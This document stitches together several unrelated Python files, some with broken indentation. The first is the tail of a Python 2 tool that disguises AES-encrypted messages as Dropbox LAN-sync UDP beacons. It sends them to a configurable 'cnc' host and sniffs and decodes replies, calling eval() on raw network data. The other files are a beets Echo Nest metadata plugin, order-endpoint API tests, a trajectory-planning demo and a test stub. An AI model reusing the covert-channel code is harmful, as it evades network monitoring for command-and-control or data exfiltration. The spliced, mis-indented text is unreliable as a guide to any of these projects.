        iv = Random.new().read(AES.block_size)
        cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return base64.b64encode(iv + cipher.encrypt(raw))
    def decrypt(self, enc):
        # Reverse of encrypt: base64-decode, split off the IV, decrypt, unpad.
        enc = base64.b64decode(enc)
        iv = enc[:AES.block_size]
        cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8')
    def _pad(self, s):
        # Each pad byte equals the pad length (PKCS#7 style, 32-byte blocks).
        return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)
    @staticmethod
    def _unpad(s):
        # Strip the padding indicated by the final byte.
        return s[:-ord(s[len(s)-1:])]
class mydict(dict):
    """dict subclass whose str() form is double-quoted JSON.

    Python's default dict repr uses single quotes; serializing through
    json.dumps makes the payload render as ordinary JSON in capture
    tools, so it blends in with genuine DB-LSP beacons.
    (Thanks to https://stackoverflow.com/questions/18283725/how-to-create-a-python-dictionary-with-double-quotes-as-default-quote-format)
    """

    def __str__(self):
        return json.dumps(self)
class DB_LSP(object):
    """Builds and sends a Dropbox-LAN-sync-protocol look-alike UDP
    datagram that hides an AES-encrypted message in the ``host_int``
    field of the beacon JSON.  (Python 2.)
    """
    def __init__(self, cnc, data, key, port=17500):
        # cnc: destination host; a ".255" address triggers broadcast mode.
        self.cnc = cnc
        self.port = port
        self.address = (self.cnc, self.port)
        self.data = data
        # Template mimicking a genuine DB-LSP discovery beacon.
        self.DEFAULT_STRUCT = {
            "host_int": 123456,
            "versions": [2, 0],
            "displayname": "",
            "port": self.port,
            "namespaces": [1, 2, 3]
        }
        self.payload = ""
        self.AES = AESCipher(key=key)
    def _Create(self):
        # Swap the encrypted message into host_int and render as JSON.
        this_data = self.DEFAULT_STRUCT
        this_data['host_int'] = self.AES.encrypt(raw=self.data)
        self.payload = str(mydict(this_data))
    def Send(self):
        # Try to create socket
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            if ".255" in self.address[0]:
                # Broadcast destination: allow address reuse and broadcasting.
                s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
            else:
                s.bind(('', self.port))
        except socket.error, e:  # Python 2 except syntax
            sys.stderr.write('Failed to create socket.\n')
            sys.stderr.write('%s\n' % e)
            return False
        try:
            s.sendto(self.payload, self.address)
            sys.stdout.write("%s bytes sent to %s.\n" % (len(self.payload), self.address))
        except:
            # NOTE(review): bare except hides the actual sendto error.
            sys.stderr.write("Error sending message to %s.\n" % str(self.address))
            return False
        return True
def SniffAndDecode(key, host, port=17500):
    """Sniff UDP traffic and print decrypted DB-LSP-style messages
    coming from *host* on source port *port*.  Blocks inside scapy's
    sniff loop until interrupted.
    """
    AESProvider = AESCipher(key=key)
    def custom_action(packet):
        # Per-packet scapy callback; counts every sniffed packet.
        global counter
        counter += 1
        if packet[0][1].src == host:
            if packet[0][UDP].sport == port:
                try:
                    message = str(packet[0][UDP].payload).strip()
                    # SECURITY: eval() on raw network data executes arbitrary
                    # expressions from the wire; json.loads(message) would be
                    # the safe equivalent for these JSON beacons.
                    jdump = eval(message)
                except:
                    sys.stderr.write("Got message from the right IP on the write port but it does not look like a DB-LSP message.\n")
                    sys.stderr.flush()
                    return
                try:
                    mess = AESProvider.decrypt(enc=jdump['host_int'].strip())
                    sys.stdout.write("\n\t%s -> %s\n" % (host, mess))
                    sys.stdout.flush()
                    return
                except:
                    sys.stderr.write("Message was recevived but not decrypted.\n")
                    sys.stderr.flush()
                    return
            else:
                return
    ## Setup sniff, filtering for IP traffic
    sys.stdout.write("Starting listener for %s.\n" % host)
    sniff(filter="udp", prn=custom_action)
def SniffWrapper(key, host, port=17500):
    """Run SniffAndDecode on a background thread and return the thread."""
    worker = threading.Thread(target=SniffAndDecode, args=(key, host, port))
    worker.start()
    return worker
def StartShell():
    """Interactive command shell (Python 2).

    Commands: send / set / show / active / deactivate / help / exit.
    State lives in ``params`` (key, server, listener, thread); ``active``
    tracks whether a sniffing thread is running.
    """
    params = {}
    active = False
    _help()
    while True:
        # Prompt shows the active server when in active mode.
        if active:
            sys.stdout.write(params['server']+'@'+PROMPT)
        else:
            sys.stdout.write(PROMPT)
        try:
            command = raw_input()
        except:
            sys.stderr.write("Whhhat?\n")
            continue
        if command.strip() == "exit" or command.strip() == "quit":
            if active:
                # NOTE(review): _Thread__stop is a private CPython API and
                # does not exist on Python 3.
                params['thread']._Thread__stop()
            sys.stdout.write("Thanks and see you soon.\n")
            sys.exit()
        if command.strip() == "help":
            _help()
            continue
        if " " in command.strip():
            # csv with a space delimiter keeps quoted arguments together.
            data = StringIO(command)
            reader = csv.reader(data, delimiter=' ')
            for row in reader:
                split_command = row
            if split_command[0] == "send":
                # Check that a key was set.
                try:
                    a = key=params['key']
                except:
                    sys.stderr.write("Please set a key with 'set key P@$$WorD!'.\n")
                    continue
                if not active:
                    # Standalone mode: destination comes on the command line.
                    if len(split_command) == 3:
                        dbObj = DB_LSP(cnc=split_command[2], data=split_command[1], key=params['key'])
                        dbObj._Create()
                        dbObj.Send()
                    else:
                        sys.stderr.write("Please use 'send \"this is data\" 8.8.8.8'.\n")
                else:
                    # Active mode: destination is the configured server.
                    if len(split_command) == 2:
                        dbObj = DB_LSP(cnc=params['server'], data=split_command[1], key=params['key'])
                        dbObj._Create()
                        dbObj.Send()
                    else:
                        sys.stderr.write("Please use 'send \"this is data\"' since you're in active mode.\n")
            elif split_command[0] == "set":
                if len(split_command) == 3:
                    params[split_command[1]] = split_command[2]
                    sys.stdout.write(" %s --> %s.\n" % (split_command[1], split_command[2]))
                else:
                    sys.stderr.write("Please use 'set param value'.\n")
            elif split_command[0] == "show":
                if split_command[1] == "params":
                    sys.stdout.write(str(params) + "\n")
                else:
                    sys.stderr.write("I don't know what to show you.\n")
            elif split_command[0] == "active":
                # Require a listener address and a key before going active.
                try:
                    a = params['listener']
                except:
                    sys.stderr.write("Please set a listener (where messages will be coming from) with 'set listener 127.0.0.1'.\n")
                    continue
                try:
                    a = key=params['key']
                except:
                    sys.stderr.write("Please set a key with 'set key P@$$WorD!'.\n")
                    continue
                sys.stdout.write("Starting active mode with %s.\n" % split_command[1])
                thread = SniffWrapper(key=params['key'], host=params['listener'])
                params['thread'] = thread
                active = True
                params['server'] = split_command[1]
            elif split_command[0] == "deactivate":
                sys.stdout.write("Deactivating.\n")
                params['thread']._Thread__stop()
                active = False
            else:
                pass
def _help():
    """Print the interactive shell usage banner."""
    help_text = """
    To communicate between two hosts over broadcast you will need:
    \t1) Setup an ecnryption key whichi will be identical on both hosts.
    \t\tset key 123456
    \t2) Know which host is going to broadcast the message:
    \t\tset listener 10.0.0.1
    \t3) Start active mode:
    \t\tactive 10.0.0.255
    Now just send messages with:
    \tsend "hello world"
    """
    print(help_text)
if __name__ == "__main__":
    StartShell()
# Example one-shot API usage kept verbatim below.  NOTE(review): the
# DB_LSP example passes host=, but the constructor's parameter is cnc=.
"""
# Constant Sniff and Decode :
SniffAndDecode(key="123456", host="OtherIP", port=17500)
# Send a message:
obj = DB_LSP(key="123456", data="Hello World", host="192.168.0.255", port=17500)
obj.Send()
"""
|
<filename>beetsplug/echonest.py
# This file is part of beets.
# Copyright 2013, <NAME>.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Fetch a variety of acoustic metrics from The Echo Nest.
"""
import time
import logging
import socket
import os
import tempfile
from string import Template
import subprocess
from beets import util, config, plugins, ui
from beets.dbcore import types
import pyechonest
import pyechonest.song
import pyechonest.track
log = logging.getLogger('beets')
# If a request at the EchoNest fails, we want to retry the request RETRIES
# times and wait between retries for RETRY_INTERVAL seconds.
RETRIES = 10
RETRY_INTERVAL = 10
DEVNULL = open(os.devnull, 'wb')
ALLOWED_FORMATS = ('MP3', 'OGG', 'AAC')
UPLOAD_MAX_SIZE = 50 * 1024 * 1024
# FIXME: use avconv?
CONVERT_COMMAND = u'ffmpeg -i $source -y -acodec libvorbis -vn -aq 2 $dest'
# Truncate to the first 300 seconds while transcoding.  The trailing
# space before the line continuation is required: without it the two
# string literals concatenate into "$source-y", fusing the source path
# with the next flag and breaking the ffmpeg command line.
TRUNCATE_COMMAND = u'ffmpeg -t 300 -i $source ' \
                   u'-y -acodec libvorbis -vn -aq 2 $dest'
# Maps attribute names from echonest to their field names in beets.
# The attributes are retrieved from a songs `audio_summary`. See:
# http://echonest.github.io/pyechonest/song.html#pyechonest.song.profile
ATTRIBUTES = {
'energy': 'energy',
'liveness': 'liveness',
'speechiness': 'speechiness',
'acousticness': 'acousticness',
'danceability': 'danceability',
'valence': 'valence',
'tempo': 'bpm',
}
# Types for the flexible fields added by `ATTRIBUTES`
FIELD_TYPES = {
'energy': types.FLOAT,
'liveness': types.FLOAT,
'speechiness': types.FLOAT,
'acousticness': types.FLOAT,
'danceability': types.FLOAT,
'valence': types.FLOAT,
}
# The twelve pitch classes in order.  The original list was missing the
# comma between 'E' and 'F', which implicitly concatenated them into a
# single 'EF' entry and left the scale one element short, corrupting
# every initial_key lookup from 'F' upward.
MUSICAL_SCALE = ['C', 'C#', 'D', 'D#', 'E', 'F',
                 'F#', 'G', 'G#', 'A', 'A#', 'B']
# We also use echonest_id (song_id) and echonest_fingerprint to speed up
# lookups.
ID_KEY = 'echonest_id'
FINGERPRINT_KEY = 'echonest_fingerprint'
def _splitstrip(string, delim=u','):
"""Split string (at commas by default) and strip whitespace from the
pieces.
"""
return [s.strip() for s in string.split(delim)]
def diff(item1, item2):
    """Score two Item objects according to the Echo Nest numerical
    fields; 0.0 means identical, larger means more different.
    """
    score = 0.0
    for field in ATTRIBUTES.values():
        if field == 'bpm':
            # Tempo is normalized separately below.
            continue
        try:
            score += abs(
                float(item1.get(field, None)) -
                float(item2.get(field, None))
            )
        except TypeError:
            # A missing value on either side costs the maximum penalty.
            score += 1.0
    try:
        bpm1 = float(item1.get('bpm', None))
        bpm2 = float(item2.get('bpm', None))
    except TypeError:
        score += 1.0
    else:
        # Normalize the tempo difference by the larger of the two.
        score += abs(bpm1 - bpm2) / max(bpm1, bpm2, 1)
    return score
def similar(lib, src_item, threshold=0.15, fmt='${difference}: ${path}'):
    """Print every item in *lib* whose Echo Nest distance from
    *src_item* is below *threshold*, rendered with template *fmt*.
    """
    for candidate in lib.items():
        if candidate.path == src_item.path:
            continue
        distance = diff(candidate, src_item)
        if distance < threshold:
            line = fmt.replace('${difference}', '{:2.2f}'.format(distance))
            ui.print_obj(candidate, lib, line)
class EchonestMetadataPlugin(plugins.BeetsPlugin):
item_types = FIELD_TYPES
    def __init__(self):
        """Register config defaults and, when `auto` is set, hook the
        import pipeline stage.
        """
        super(EchonestMetadataPlugin, self).__init__()
        self.config.add({
            'auto': True,
            'apikey': u'<KEY>',
            'upload': True,
            'convert': True,
            'truncate': True,
        })
        # Allow each fetched attribute name to be remapped via config.
        self.config.add(ATTRIBUTES)
        pyechonest.config.ECHO_NEST_API_KEY = \
            config['echonest']['apikey'].get(unicode)  # `unicode`: Python 2
        if self.config['auto']:
            self.import_stages = [self.imported]
    def _echofun(self, func, **kwargs):
        """Wrapper for requests to the EchoNest API. Will retry up to
        RETRIES times and wait between retries for RETRY_INTERVAL
        seconds.  Returns the API result, or None on permanent failure.
        """
        for i in range(RETRIES):
            try:
                result = func(**kwargs)
            except pyechonest.util.EchoNestAPIError as e:
                if e.code == 3:
                    # reached access limit per minute
                    log.debug(u'echonest: rate-limited on try {0}; '
                              u'waiting {1} seconds'
                              .format(i + 1, RETRY_INTERVAL))
                    time.sleep(RETRY_INTERVAL)
                elif e.code == 5:
                    # specified identifier does not exist
                    # no use in trying again.
                    log.debug(u'echonest: {0}'.format(e))
                    return None
                else:
                    log.error(u'echonest: {0}'.format(e.args[0][0]))
                    return None
            except (pyechonest.util.EchoNestIOError, socket.error) as e:
                # Transient network problem: wait and retry.
                log.warn(u'echonest: IO error: {0}'.format(e))
                time.sleep(RETRY_INTERVAL)
            except Exception as e:
                # there was an error analyzing the track, status: error
                log.debug(u'echonest: {0}'.format(e))
                return None
            else:
                # Success: leave the retry loop.
                break
        else:
            # If we exited the loop without breaking, then we used up all
            # our allotted retries.
            log.error(u'echonest request failed repeatedly')
            return None
        return result
def _pick_song(self, songs, item):
"""Helper method to pick the best matching song from a list of songs
returned by the EchoNest. Compares artist, title and duration. If
the artist and title match and the duration difference is <= 1.0
seconds, it's considered a match.
"""
if not songs:
log.debug(u'echonest: no songs found')
return
pick = None
min_dist = item.length
for song in songs:
if song.artist_name.lower() == item.artist.lower() \
and song.title.lower() == item.title.lower():
dist = abs(item.length - song.audio_summary['duration'])
if dist < min_dist:
min_dist = dist
pick = song
if min_dist > 2.5:
return None
return pick
def _flatten_song(self, song):
"""Given an Echo Nest song object, return a flat dict containing
attributes we care about. If song is None, return None.
"""
if not song:
return
values = dict(song.audio_summary)
values['id'] = song.id
return values
# "Profile" (ID-based) lookup.
def profile(self, item):
"""Do a lookup on the EchoNest by MusicBrainz ID.
"""
# Use an existing Echo Nest ID.
if ID_KEY in item:
enid = item[ID_KEY]
# Look up the Echo Nest ID based on the MBID.
else:
if not item.mb_trackid:
log.debug(u'echonest: no ID available')
return
mbid = 'musicbrainz:track:{0}'.format(item.mb_trackid)
track = self._echofun(pyechonest.track.track_from_id,
identifier=mbid)
if not track:
log.debug(u'echonest: lookup by MBID failed')
return
enid = track.song_id
# Use the Echo Nest ID to look up the song.
songs = self._echofun(pyechonest.song.profile, ids=enid,
buckets=['id:musicbrainz', 'audio_summary'])
return self._flatten_song(self._pick_song(songs, item))
# "Search" (metadata-based) lookup.
def search(self, item):
"""Search the item at the EchoNest by artist and title.
"""
songs = self._echofun(pyechonest.song.search, title=item.title,
results=100, artist=item.artist,
buckets=['id:musicbrainz', 'tracks',
'audio_summary'])
return self._flatten_song(self._pick_song(songs, item))
# "Analyze" (upload the audio itself) method.
def prepare_upload(self, item):
"""Truncate and convert an item's audio file so it can be
uploaded to echonest.
Return a ``(source, tmp)`` tuple where `source` is the path to
the file to be uploaded and `tmp` is a temporary file to be
deleted after the upload or `None`.
If conversion or truncation fails, return `None`.
"""
source = item.path
tmp = None
if item.format not in ALLOWED_FORMATS:
if config['echonest']['convert']:
tmp = source = self.convert(source)
if not tmp:
return
if os.stat(source).st_size > UPLOAD_MAX_SIZE:
if config['echonest']['truncate']:
source = self.truncate(source)
if tmp is not None:
util.remove(tmp)
tmp = source
else:
return
if source:
return source, tmp
    def convert(self, source):
        """Converts an item in an unsupported media format to ogg. Config
        pending.
        This is stolen from <NAME> convert plugin.

        Returns the destination path, or None when the encode fails.
        """
        fd, dest = tempfile.mkstemp(u'.ogg')
        # ffmpeg writes the file itself; only the reserved path is needed.
        os.close(fd)
        log.info(u'echonest: encoding {0} to {1}'.format(
            util.displayable_path(source),
            util.displayable_path(dest),
        ))
        opts = []
        for arg in CONVERT_COMMAND.split():
            arg = arg.encode('utf-8')  # Python 2: command args as bytes
            opts.append(Template(arg).substitute(source=source, dest=dest))
        # Run the command.
        try:
            util.command_output(opts)
        except (OSError, subprocess.CalledProcessError) as exc:
            log.debug(u'echonest: encode failed: {0}'.format(exc))
            # Don't leave a partial temp file behind.
            util.remove(dest)
            return
        log.info(u'echonest: finished encoding {0}'.format(
            util.displayable_path(source))
        )
        return dest
    def truncate(self, source):
        """Truncates an item to a size less than UPLOAD_MAX_SIZE.

        Re-encodes only the first 300 seconds to a temporary OGG file
        and returns its path, or None when the command fails.
        """
        fd, dest = tempfile.mkstemp(u'.ogg')
        # ffmpeg writes the file itself; only the reserved path is needed.
        os.close(fd)
        log.info(u'echonest: truncating {0} to {1}'.format(
            util.displayable_path(source),
            util.displayable_path(dest),
        ))
        opts = []
        for arg in TRUNCATE_COMMAND.split():
            arg = arg.encode('utf-8')  # Python 2: command args as bytes
            opts.append(Template(arg).substitute(source=source, dest=dest))
        # Run the command.
        try:
            util.command_output(opts)
        except (OSError, subprocess.CalledProcessError) as exc:
            log.debug(u'echonest: truncate failed: {0}'.format(exc))
            # Don't leave a partial temp file behind.
            util.remove(dest)
            return
        log.info(u'echonest: truncate encoding {0}'.format(
            util.displayable_path(source))
        )
        return dest
    def analyze(self, item):
        """Upload the item to the EchoNest for analysis. May require to
        convert the item to a supported media format.

        Returns a flat metadata dict (full song data when a matching
        song is found, otherwise the track-level subset), or None.
        """
        prepared = self.prepare_upload(item)
        if not prepared:
            log.debug(u'echonest: could not prepare file for upload')
            return
        source, tmp = prepared
        log.info(u'echonest: uploading file, please be patient')
        track = self._echofun(pyechonest.track.track_from_filename,
                              filename=source)
        if tmp is not None:
            # The converted/truncated temp file is no longer needed.
            util.remove(tmp)
        if not track:
            log.debug(u'echonest: failed to upload file')
            return
        # Sometimes we have a track but no song. I guess this happens for
        # new / unverified songs. We need to "extract" the audio_summary
        # from the track object manually. I don't know why the
        # pyechonest API handles tracks (merge audio_summary to __dict__)
        # and songs (keep audio_summary in an extra attribute)
        # differently.
        # Maybe a patch for pyechonest could help?
        # First get the (limited) metadata from the track in case
        # there's no associated song.
        from_track = {}
        for key in ATTRIBUTES:
            try:
                from_track[key] = getattr(track, key)
            except AttributeError:
                # Not every attribute is present on every track.
                pass
        from_track['duration'] = track.duration
        # Try to look up a song for the full metadata.
        try:
            song_id = track.song_id
        except AttributeError:
            # No associated song at all: settle for track metadata.
            return from_track
        songs = self._echofun(pyechonest.song.profile,
                              ids=[song_id], track_ids=[track.id],
                              buckets=['audio_summary'])
        if songs:
            pick = self._pick_song(songs, item)
            if pick:
                return self._flatten_song(pick)
        return from_track  # Fall back to track metadata.
# Shared top-level logic.
def fetch_song(self, item):
"""Try all methods to get a matching song object from the
EchoNest. If no method succeeds, return None.
"""
# There are four different ways to get a song. Each method is a
# callable that takes the Item as an argument.
methods = [self.profile, self.search]
if config['echonest']['upload']:
methods.append(self.analyze)
# Try each method in turn.
for method in methods:
song = method(item)
if song:
log.debug(
u'echonest: got song through {0}: {1} - {2} [{3}]'.format(
method.__name__,
item.artist,
item.title,
song.get('duration'),
)
)
return song
def apply_metadata(self, item, values, write=False):
"""Copy the metadata from the dictionary of song information to
the item.
"""
# Update each field.
for k, v in values.iteritems():
if k in ATTRIBUTES:
field = ATTRIBUTES[k]
log.debug(u'echonest: metadata: {0} = {1}'.format(field, v))
if field == 'bpm':
item[field] = int(v)
else:
item[field] = v
if 'key' in values and 'mode' in values:
key = MUSICAL_SCALE[values['key'] - 1]
if values['mode'] == 0: # Minor key
key += 'm'
item['initial_key'] = key
if 'id' in values:
enid = values['id']
log.debug(u'echonest: metadata: {0} = {1}'.format(ID_KEY, enid))
item[ID_KEY] = enid
# Write and save.
if write:
item.try_write()
item.store()
# Automatic (on-import) metadata fetching.
def imported(self, session, task):
"""Import pipeline stage.
"""
for item in task.imported_items():
song = self.fetch_song(item)
if song:
self.apply_metadata(item, song)
# Explicit command invocation.
def requires_update(self, item):
"""Check if this item requires an update from the EchoNest (its
data is missing).
"""
for field in ATTRIBUTES.values():
if not item.get(field):
return True
log.info(u'echonest: no update required')
return False
    def commands(self):
        """Provide the ``echonest`` (fetch metadata) and ``echosim``
        (show similar files) CLI subcommands.
        """
        fetch_cmd = ui.Subcommand('echonest',
                                  help='Fetch metadata from the EchoNest')
        fetch_cmd.parser.add_option(
            '-f', '--force', dest='force', action='store_true', default=False,
            help='(re-)download information from the EchoNest'
        )

        def fetch_func(lib, opts, args):
            # Fetch (and optionally write) metadata for each matched item.
            self.config.set_args(opts)
            write = config['import']['write'].get(bool)
            for item in lib.items(ui.decargs(args)):
                log.info(u'echonest: {0} - {1}'.format(item.artist,
                                                       item.title))
                # Only hit the network when forced or data is missing.
                if self.config['force'] or self.requires_update(item):
                    song = self.fetch_song(item)
                    if song:
                        self.apply_metadata(item, song, write)

        fetch_cmd.func = fetch_func

        sim_cmd = ui.Subcommand('echosim', help='show related files')
        sim_cmd.parser.add_option(
            '-t', '--threshold', dest='threshold', action='store',
            type='float', default=0.15, help='Set difference threshold'
        )
        sim_cmd.parser.add_option(
            '-f', '--format', action='store', default='${difference}: ${path}',
            help='print with custom format'
        )

        def sim_func(lib, opts, args):
            # Print items similar to each matched item.
            self.config.set_args(opts)
            for item in lib.items(ui.decargs(args)):
                similar(lib, item, opts.threshold, opts.format)

        sim_cmd.func = sim_func

        return [fetch_cmd, sim_cmd]
|
from faker import Faker
from restapi.tests import API_URI, FlaskClient
from tests.custom import SeadataTests
class TestApp(SeadataTests):
    """Endpoint tests for the /orders API: allowed methods,
    authentication requirements, and input validation."""

    def test_01(self, client: FlaskClient, faker: Faker) -> None:
        """Exercise the orders endpoints without and with credentials."""
        # GET /api/orders/my_order_id
        # PUT /api/orders/my_order_id
        # Unauthenticated requests on supported methods -> 401;
        # unsupported methods -> 405.
        r = client.get(f"{API_URI}/orders/my_order_id")
        assert r.status_code == 401
        r = client.put(f"{API_URI}/orders/my_order_id")
        assert r.status_code == 401
        r = client.post(f"{API_URI}/orders/my_order_id")
        assert r.status_code == 405
        r = client.patch(f"{API_URI}/orders/my_order_id")
        assert r.status_code == 405
        r = client.delete(f"{API_URI}/orders/my_order_id")
        assert r.status_code == 405
        # POST /api/orders
        # DELETE /api/orders
        r = client.post(f"{API_URI}/orders")
        assert r.status_code == 401
        r = client.delete(f"{API_URI}/orders")
        assert r.status_code == 401
        r = client.get(f"{API_URI}/orders")
        assert r.status_code == 405
        r = client.put(f"{API_URI}/orders")
        assert r.status_code == 405
        r = client.patch(f"{API_URI}/orders")
        assert r.status_code == 405
        # GET /api/orders/<order_id>/download/<ftype>/c/<code>
        # The download endpoint validates ftype before authentication.
        r = client.get(f"{API_URI}/orders/my_order_id/download/my_ftype/c/my_code")
        assert r.status_code == 400
        assert self.get_seadata_response(r) == "Invalid file type my_ftype"
        r = client.post(f"{API_URI}/orders/my_order_id/download/my_ftype/c/my_code")
        assert r.status_code == 405
        r = client.put(f"{API_URI}/orders/my_order_id/download/my_ftype/c/my_code")
        assert r.status_code == 405
        r = client.patch(f"{API_URI}/orders/my_order_id/download/my_ftype/c/my_code")
        assert r.status_code == 405
        r = client.delete(f"{API_URI}/orders/my_order_id/download/my_ftype/c/my_code")
        assert r.status_code == 405
        # Authenticated requests with an empty payload -> schema errors.
        headers = self.login(client)
        r = client.post(f"{API_URI}/orders", headers=headers, json={})
        assert r.status_code == 400
        response = self.get_content(r)
        assert isinstance(response, dict)
        self.check_endpoints_input_schema(response)
        r = client.delete(f"{API_URI}/orders", headers=headers, json={})
        assert r.status_code == 400
        response = self.get_content(r)
        assert isinstance(response, dict)
        self.check_endpoints_input_schema(response)
        # Test download with wrong ftype (only accepts 0x and 1x as types)
        r = client.get(f"{API_URI}/orders/my_order_id/download/0/c/my_code")
        assert r.status_code == 400
        assert self.get_seadata_response(r) == "Invalid file type 0"
        # Test download with wrong ftype (only accepts 0x and 1x as types)
        r = client.get(f"{API_URI}/orders/my_order_id/download/20/c/my_code")
        assert r.status_code == 400
        assert self.get_seadata_response(r) == "Invalid file type 20"
        # Test download with wrong code (ftype 00 == unrestricted orders)
        r = client.get(f"{API_URI}/orders/my_order_id/download/00/c/my_code")
        assert r.status_code == 404
        error = "Order 'my_order_id' not found (or no permissions)"
        assert self.get_seadata_response(r) == error
        # Legacy end-to-end flow kept for reference (order creation,
        # download-link request, deletion); requires a live API client.
        # order_id = faker.pystr()
        # pids = ["00.T12345/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"]
        # params = {
        #     "request_id": order_id, "edmo_code": 12345, "datetime": now,
        #     "version": "1", "api_function": "order_create_zipfile",
        #     "test_mode": "true", "parameters": {
        #         "backdoor": True,
        #         "login_code": "unknown", "restricted": "false",
        #         "file_name": f"order_{order_id}_unrestricted",
        #         "order_number": order_id, "pids": pids, "file_count": len(pids),
        #     }
        # }
        # apiclient.call(
        #     URI, method='post', endpoint='/api/orders',
        #     token=token, payload=params
        # )
        # print_section("Request download links")
        # # PUT /api/order/<OID> -> return iticket_code
        # out = apiclient.call(
        #     URI, method='put', endpoint='/api/orders/%s' % order_id,
        #     token=token
        # )
        # # DELETE ORDER
        # params = {
        #     "request_id": order_id, "edmo_code": 634, "datetime": now,
        #     "version": "1", "api_function": "delete_orders",
        #     "test_mode": "true", "parameters": {
        #         "orders": [order_id],
        #         "backdoor": True
        #     }
        # }
        # apiclient.call(
        #     URI, method='delete', endpoint='/api/orders',
        #     token=token, payload=params
        # )
|
#!/usr/bin/env python
"""Batch demo for DiffGPMP2: load a 2D planning dataset, plan from
straight-line initializations, and plot the resulting trajectories."""
import os, sys
sys.path.insert(0, "..")
import matplotlib.pyplot as plt
import numpy as np
import pprint
import time
import torch
from torch.utils.data import Dataset, DataLoader
from diff_gpmp2.env.env_2d import Env2D
from diff_gpmp2.robot_models import PointRobot2D
from diff_gpmp2.gpmp2.diff_gpmp2_planner import DiffGPMP2Planner
from diff_gpmp2.utils.helpers import load_params
from diff_gpmp2.datasets import PlanningDataset
use_cuda = False
np.set_printoptions(threshold=sys.maxsize, linewidth=np.inf)
pp = pprint.PrettyPrinter()
torch.set_default_tensor_type(torch.DoubleTensor)
# Only use CUDA when both requested above and actually available.
use_cuda = torch.cuda.is_available() if use_cuda else False
device = torch.device('cuda') if use_cuda else torch.device('cpu')
dataset_folder = os.path.abspath('../diff_gpmp2/datasets/dataset_files/dataset_2d_1/')
plan_param_file = os.path.abspath('configs/gpmp2_2d_params.yaml')
robot_param_file = os.path.abspath('configs/robot_2d.yaml')
env_param_file = os.path.abspath('configs/env_2d_params.yaml')
# Fixed seeds for reproducible batches/trajectories.
np.random.seed(0)
torch.manual_seed(0)
#Get sample problem from dataset
batch_size = 4
dataset = PlanningDataset(dataset_folder, mode='train', label_subdir='opt_trajs_gpmp2')
dataloader = DataLoader(dataset, batch_size=batch_size,
                        shuffle=True, num_workers=4)
#Load parameters
env_data, planner_params, gp_params, obs_params, optim_params, robot_data = load_params(plan_param_file, robot_param_file, env_param_file, device)
#Get a batch of data
# NOTE(review): this keeps the batch at index 1 (the second batch), not
# the first -- confirm that is intentional.
sample_batch = {}
for i, sample in enumerate(dataloader):
  sample_batch = sample
  if i == 1:
    break
im_b = sample_batch['im']
sdf_b = sample_batch['sdf']
start_b = sample_batch['start']
goal_b = sample_batch['goal']
th_opt_b = sample_batch['th_opt']
# env_params_b = sample_batch['env_params']
env_params = {'x_lims': env_data['x_lims'], 'y_lims': env_data['y_lims']}
#2D Point robot model
robot = PointRobot2D(robot_data['sphere_radius'][0], use_cuda=use_cuda)
#Initial trajectories are just straight lines from start to goal
total_time_step = planner_params['total_time_step']
total_time_sec = planner_params['total_time_sec']
dof = planner_params['dof']
th_init_tmp = torch.zeros((batch_size, int(total_time_step)+1, planner_params['state_dim']), device=device) #Straight line at constant velocity
for j in range(batch_size):
  avg_vel = (goal_b[j][0, 0:dof] - start_b[j][0, 0:dof])/total_time_sec
  # Linear interpolation of positions plus constant average velocity.
  for i in range(int(total_time_step)+1):
    th_init_tmp[j][i, 0:2] = start_b[j][0, 0:dof]*(total_time_step - i)*1./total_time_step*1. + goal_b[j][0, 0:dof] * i*1./total_time_step*1. #+ np.array([0., 5.0])
    th_init_tmp[j][i, 2:4] = avg_vel
th_init_b = th_init_tmp
th_init_b.requires_grad_(True)
planner = DiffGPMP2Planner(gp_params, obs_params, planner_params, optim_params, env_params, robot, use_cuda=use_cuda)
th_finalb, err_initb, err_finalb, err_per_iterb, jb, timeb = planner.forward(th_init_b, start_b, goal_b, im_b, sdf_b)
# print('Num iterations = {}, Time taken = {}'.format(k, time_taken))
plt.ion()
# Visualize each problem in the batch: planned path over the SDF.
# NOTE(review): the inner loop below reuses loop variable `i`, shadowing
# the outer batch index -- harmless for iteration here, but confusing.
for i in range(batch_size):
  im = im_b[i, 0, :, :]
  sdf = sdf_b[i, 0, :, : ]
  start = start_b[i]
  goal = goal_b[i]
  th_f = th_finalb[i]
  th_opt = th_opt_b[i]
  env = Env2D(env_params)
  env.initialize_from_image(im, sdf)
  path_f = []
  path_opt = []
  for i in range(th_opt.shape[0]):
    path_f.append(th_f[i,0:2])
    path_opt.append(th_opt[i,0:2])
  env.initialize_plot(start[0][0:2], goal[0][0:2])
  env.plot_edge(path_f)
  # env.plot_edge(path_opt)
  env.plot_signed_distance_transform()
  plt.show()
  input('Press enter to view next data point')
  env.close_plot()
plt.close()
<filename>build/lib/brainx/tests/test_weighted_modularity.py<gh_stars>1-10
"""Tests for the weighted_modularity module"""
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import os
import unittest
# Third party
import networkx as nx
import nose.tools as nt
import numpy as np
import numpy.testing as npt
# Our own
from .. import util
from .. import weighted_modularity as wm
def get_test_data():
    """ grabs local txt file with adj matrices
    Returns
    =======
    graph : networkx graph
    communities : list of sets
    """
    pth, _ = os.path.split(__file__)
    testdir = os.path.join(pth, 'tdata_corr_txt')
    data_file = os.path.join(testdir, '101_Block01.txt')
    mat = np.loadtxt(data_file)
    # Zero out negative correlations so all edge weights are non-negative.
    mat[mat<0] = 0
    graph = nx.from_numpy_matrix(mat)
    # graph has 85 nodes, make generic communities
    # NOTE(review): range(42, 86) labels nodes 42..85, i.e. 86 labels in
    # total -- confirm the graph really contains node 85.
    communities = [set(range(42)), set(range(42,86))]
    return graph, communities
class TestWeightedPartition(unittest.TestCase):
